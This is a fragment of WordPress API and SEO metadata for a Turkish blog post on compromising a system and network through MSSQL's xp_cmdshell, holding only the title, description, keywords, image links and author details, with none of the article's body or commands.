ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. En k\u00fc\u00e7\u00fck zaafiyet..\",\"breadcrumb\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#breadcrumb\"},\"inLanguage\":\"tr\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage\",\"url\":\"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png\",\"contentUrl\":\"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png\",\"width\":734,\"height\":419,\"caption\":\"MsSql Networks\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Anasayfa\",\"item\":\"https:\/\/multimediabilgisayar.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#website\",\"url\":\"https:\/\/multimediabilgisayar.com\/blog\/\",\"name\":\"Multimedia Bilgisayar | Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/multimediabilgisayar.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"tr\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#organization\",\"name\":\"Multimedia Bilgisayar | Blog\",\"url\":\"https:\/\/multimediabilgisayar.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2024\/11\/Multi-Logo-Siyah.png\",\"contentUrl\":\"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2024\/11\/Multi-Logo-Siyah.png\",\"width\":2386,\"height\":403,\"caption\":\"Multimedia Bilgisayar | Blog\"},\"image\":{\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/person\/75acd01e1e2de1d9d7b9c18ecfd81c90\",\"name\":\"Multimedia\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"tr\",\"@id\":\"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/90ae74e7c1a5a394ce7dec103aa0919c6a0a7c2f7e01f9275dca8e0c3f598c9f?s=96&d=wp_user_avatar&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/90ae74e7c1a5a394ce7dec103aa0919c6a0a7c2f7e01f9275dca8e0c3f598c9f?s=96&d=wp_user_avatar&r=g\",\"caption\":\"Multimedia\"},\"sameAs\":[\"https:\/\/multimediabilgisayar.com\/blog\"],\"url\":\"https:\/\/multimediabilgisayar.com\/blog\/author\/multi-admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme - Multimedia Bilgisayar | Blog","description":"Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. En k\u00fc\u00e7\u00fck zaafiyet..","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/","og_locale":"tr_TR","og_type":"article","og_title":"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme - Multimedia Bilgisayar | Blog","og_description":"Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. En k\u00fc\u00e7\u00fck zaafiyet..","og_url":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/","og_site_name":"Multimedia Bilgisayar | Blog","article_published_time":"2016-08-17T10:18:30+00:00","article_modified_time":"2022-08-31T08:33:07+00:00","og_image":[{"width":734,"height":419,"url":"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png","type":"image\/png"}],"author":"Multimedia","twitter_card":"summary_large_image","twitter_misc":{"Yazan:":"Multimedia","Tahmini okuma s\u00fcresi":"9 dakika"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#article","isPartOf":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/"},"author":{"name":"Multimedia","@id":"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/person\/75acd01e1e2de1d9d7b9c18ecfd81c90"},"headline":"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme","datePublished":"2016-08-17T10:18:30+00:00","dateModified":"2022-08-31T08:33:07+00:00","mainEntityOfPage":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/"},"wordCount":1467,"commentCount":0,"publisher":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/#organization"},"image":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage"},"thumbnailUrl":"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png","keywords":["brute force mssql","microsoft server","microsoft sql server 2008","msfconsole","mssql","mssql g\u00fcvenli\u011fi","mssql sald\u0131r\u0131 yapmak","mssql server","shell atmak","sql komut \u00e7al\u0131\u015ft\u0131rma","xp_cmdshell"],"articleSection":["G\u00fcvenlik","Siber G\u00fcvenlik"],"inLanguage":"tr","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/","url":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/","name":"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme - Multimedia Bilgisayar | Blog","isPartOf":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage"},"image":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage"},"thumbnailUrl":"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png","datePublished":"2016-08-17T10:18:30+00:00","dateModified":"2022-08-31T08:33:07+00:00","description":"Pantest \u00e7al\u0131\u015fmalar\u0131n\u0131n amac\u0131 hedef sistemi en y\u00fcksek kullan\u0131c\u0131 yetkileri ile ele ge\u00e7irmek ve hedef sistem \u00fczerinde ilerlemektir. En k\u00fc\u00e7\u00fck zaafiyet..","breadcrumb":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#breadcrumb"},"inLanguage":"tr","potentialAction":[{"@type":"ReadAction","target":["https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/"]}]},{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#primaryimage","url":"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png","contentUrl":"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2016\/08\/mssql_networks.png","width":734,"height":419,"caption":"MsSql Networks"},{"@type":"BreadcrumbList","@id":"https:\/\/multimediabilgisayar.com\/blog\/mssql-uzerinden-xp_cmdshell-isletim-sistemini-networku-ele-gecirme\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Anasayfa","item":"https:\/\/multimediabilgisayar.com\/blog\/"},{"@type":"ListItem","position":2,"name":"MSSQL \u00dczerinden (xp_cmdshell) \u0130\u015fletim Sistemini ve Network\u00fc Ele Ge\u00e7irme"}]},{"@type":"WebSite","@id":"https:\/\/multimediabilgisayar.com\/blog\/#website","url":"https:\/\/multimediabilgisayar.com\/blog\/","name":"Multimedia Bilgisayar | Blog","description":"","publisher":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/multimediabilgisayar.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"tr"},{"@type":"Organization","@id":"https:\/\/multimediabilgisayar.com\/blog\/#organization","name":"Multimedia Bilgisayar | Blog","url":"https:\/\/multimediabilgisayar.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2024\/11\/Multi-Logo-Siyah.png","contentUrl":"https:\/\/multimediabilgisayar.com\/blog\/wp-content\/uploads\/2024\/11\/Multi-Logo-Siyah.png","width":2386,"height":403,"caption":"Multimedia Bilgisayar | Blog"},"image":{"@id":"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/person\/75acd01e1e2de1d9d7b9c18ecfd81c90","name":"Multimedia","image":{"@type":"ImageObject","inLanguage":"tr","@id":"https:\/\/multimediabilgisayar.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/90ae74e7c1a5a394ce7dec103aa0919c6a0a7c2f7e01f9275dca8e0c3f598c9f?s=96&d=wp_user_avatar&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/90ae74e7c1a5a394ce7dec103aa0919c6a0a7c2f7e01f9275dca8e0c3f598c9f?s=96&d=wp_user_avatar&r=g","caption":"Multimedia"},"sameAs":["https:\/\/multimediabilgisayar.com\/blog"],"url":"https:\/\/multimediabilgisayar.com\/blog\/author\/multi-admin\/"}]}},"_links":{"self":[{"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/posts\/754","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/comments?post=754"}],"version-history":[{"count":71,"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/posts\/754\/revisions"}],"predecessor-version":[{"id":5594,"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/posts\/754\/revisions\/5594"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/media\/2432"}],"wp:attachment":[{"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/media?parent=754"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/categories?post=754"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/multimediabilgisayar.com\/blog\/wp-json\/wp\/v2\/tags?post=754"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}